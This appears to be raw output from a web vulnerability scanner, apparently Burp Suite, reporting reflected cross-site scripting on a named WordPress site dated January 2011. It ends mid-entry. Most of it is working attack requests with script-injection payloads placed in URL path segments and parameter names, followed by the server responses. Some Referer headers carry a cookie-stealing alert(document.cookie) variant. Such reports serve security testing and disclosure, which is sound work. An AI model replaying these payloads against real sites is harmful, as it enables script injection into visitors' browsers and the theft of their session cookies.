GET /wp-content/plugins/sexybookmarks/jsf1bd8"><script>alert(1)</script>5954009ca3e/shareaholic-publishers.min.js/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:19:34 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:19:35 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47467
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9136f"><script>alert(1)</script>3ea9e8dbbbd was submitted in the REST URL parameter 5. This input was echoed as 9136f\"><script>alert(1)</script>3ea9e8dbbbd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js9136f"><script>alert(1)</script>3ea9e8dbbbd/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:19:57 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:19:58 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47467
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c54c"><script>alert(1)</script>11551064c28 was submitted in the REST URL parameter 6. This input was echoed as 2c54c\"><script>alert(1)</script>11551064c28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page2c54c"><script>alert(1)</script>11551064c28/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:20:20 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:20:21 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff04"><script>alert(1)</script>5685fddf53f was submitted in the REST URL parameter 7. This input was echoed as aff04\"><script>alert(1)</script>5685fddf53f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2aff04"><script>alert(1)</script>5685fddf53f HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:20:28 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:20:29 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.185. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a97b2"><script>alert(1)</script>481e6eac7c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a97b2\"><script>alert(1)</script>481e6eac7c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2?a97b2"><script>alert(1)</script>481e6eac7c6=1 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:17:11 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Mon, 31 Jan 2011 20:17:12 GMT Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47505
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ee8e"><script>alert(1)</script>7e220eebda7 was submitted in the REST URL parameter 1. This input was echoed as 7ee8e\"><script>alert(1)</script>7e220eebda7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content7ee8e"><script>alert(1)</script>7e220eebda7/plugins/wp-followme/flash/wp_followme.swf HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:20:44 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 20:20:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa90"><script>alert(1)</script>4eaf9ab9417 was submitted in the REST URL parameter 2. This input was echoed as bfa90\"><script>alert(1)</script>4eaf9ab9417 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/pluginsbfa90"><script>alert(1)</script>4eaf9ab9417/wp-followme/flash/wp_followme.swf HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:20:54 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 20:20:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64678"><script>alert(1)</script>1b810eecd7d was submitted in the REST URL parameter 3. This input was echoed as 64678\"><script>alert(1)</script>1b810eecd7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/wp-followme64678"><script>alert(1)</script>1b810eecd7d/flash/wp_followme.swf HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:20:59 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 20:21:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b8a"><script>alert(1)</script>bf9f4fc53b was submitted in the REST URL parameter 4. This input was echoed as f3b8a\"><script>alert(1)</script>bf9f4fc53b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/wp-followme/flashf3b8a"><script>alert(1)</script>bf9f4fc53b/wp_followme.swf HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:21:04 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 20:21:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44393
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2ce5"><script>alert(1)</script>28fd4a0ed78 was submitted in the REST URL parameter 5. This input was echoed as c2ce5\"><script>alert(1)</script>28fd4a0ed78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/wp-followme/flash/wp_followme.swfc2ce5"><script>alert(1)</script>28fd4a0ed78 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:21:09 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 20:21:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.191. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87f3"><script>alert(1)</script>10e5d12dd72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a87f3\"><script>alert(1)</script>10e5d12dd72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/wp-followme/flash/wp_followme.swf?a87f3"><script>alert(1)</script>10e5d12dd72=1 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:20:10 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent Last-Modified: Mon, 31 Jan 2011 20:20:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44430
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8e07"><script>alert(1)</script>560c779c807 was submitted in the REST URL parameter 1. This input was echoed as f8e07\"><script>alert(1)</script>560c779c807 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentf8e07"><script>alert(1)</script>560c779c807/themes/rt_mynxx_wp/css/light.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:01 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38594"><script>alert(1)</script>1d9606001d8 was submitted in the REST URL parameter 2. This input was echoed as 38594\"><script>alert(1)</script>1d9606001d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes38594"><script>alert(1)</script>1d9606001d8/rt_mynxx_wp/css/light.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:13 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f395"><script>alert(1)</script>7a4b1d2f5e3 was submitted in the REST URL parameter 3. This input was echoed as 6f395\"><script>alert(1)</script>7a4b1d2f5e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp6f395"><script>alert(1)</script>7a4b1d2f5e3/css/light.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:25 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f787"><script>alert(1)</script>d9c7a8e343b was submitted in the REST URL parameter 4. This input was echoed as 9f787\"><script>alert(1)</script>d9c7a8e343b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/css9f787"><script>alert(1)</script>d9c7a8e343b/light.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:28 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c386"><script>alert(1)</script>a3110606fc was submitted in the REST URL parameter 5. This input was echoed as 2c386\"><script>alert(1)</script>a3110606fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
